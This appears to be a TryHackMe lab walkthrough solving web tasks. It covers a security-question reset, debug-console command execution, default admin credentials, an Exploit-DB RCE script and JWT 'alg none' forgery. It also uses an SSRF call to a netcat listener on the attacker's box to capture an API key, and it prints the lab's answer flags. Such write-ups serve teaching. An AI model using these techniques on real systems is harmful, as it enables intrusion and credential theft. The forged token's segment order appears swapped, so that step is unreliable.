Visit the page ht​tp://MACHINE_IP:PORT and click on the 'I forgot my password' link and enter the username joseph. You will be brought to a page where you have to answer a security question. Two questions might be easily guessed:

• What is you first pet's current address?

  With possible answers:

  • Heaven
  • Hell

• What is your favourite color?

  Possible answers:

  • blue
  • green
  • black
  • red

After trying these answers it turns out green is joseph's favourite color. We are given a new password with which we can login to his account and read the flag from flag.txt.

THM{Not_3ven_c4tz_c0uld_sav3_U!}

Go to h​ttp://MACHINE_IP:PORT/console and enter in the console

import os; print(os.popen("ls -l").read())

The database file name is: todo.db.

To get the value of secret_flag inside app.py run from the console:

print(os.popen("grep secret_flag app.py").read())

The flag is:

THM{Just_a_tiny_misconfiguration}

Go to the page h​ttp://MACHINE_IP:PORT. After look around the website for a bit the most interesting page in the admin login page. Trying admin:admin as username:password turns out to actually work. After some more browsing it is unclear what to do so the hint suggests to search for 'remote command executions in bookstore app', which bring up https://www.exploit-db.com/exploits/47887. Downloading this script to the attackbox and executing it with:

python 47887.py

results in RCE. Type y when prompted on the command line and

cat /opt/flag.txt

to get the flag

THM{But_1ts_n0t_my_f4ult!}

The password for the guest account is guest.

Find the cookie as described in the task description and base64 decode the first two values.

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNjk4MzAwNTI0fQ.BVUSmKNixf99vZZdga_n9QRJL2WwoGbKYSe1xF6yD0M

echo "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9" | base64 -d
echo
echo "eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNjk4Mjk4ODUxfQ==" | base64 -d

{"typ":"JWT","alg":"HS256"}
{"username":"guest","exp":1698298851}

Note that the second decoded value must be padded with two = signs, because there must be a multiple of 4 characters in the encoded string.

Now change the username to 'admin' and the alg to 'none' and base64 encode those strings.

echo '{"username":"admin","exp":1698298851}' | base64
echo '{"typ":"JWT","alg":"none"}' | base64

eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjk4Mjk4ODUxfQo=
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0K

replace the cookie values with the new encoded values seperated with a dot (do not include the original signature)

eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjk4Mjk4ODUxfQo=.eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0K.

Refresh the web pages to get the flag:

THM{Dont_take_cookies_from_strangers}

When you open the supplied file it is obvious the IP of the attacker is:

49.99.13.16

And the type of attack is:

brute force

Go to the admin area, it will tell you only localhost can login as admin.

Checking the source of the home page of this website you can see that the download resume button points to:

secure-file-storage.com

To get the API key, open a terminal on the attackbox and run:

nc -lvp 8080

then via the browser go to http://machine_ip:port/ATTACKBOX_IP:8080&id=1 the API key wil then be shown on the netcat terminal:

THM{Hello_Im_just_an_API_key}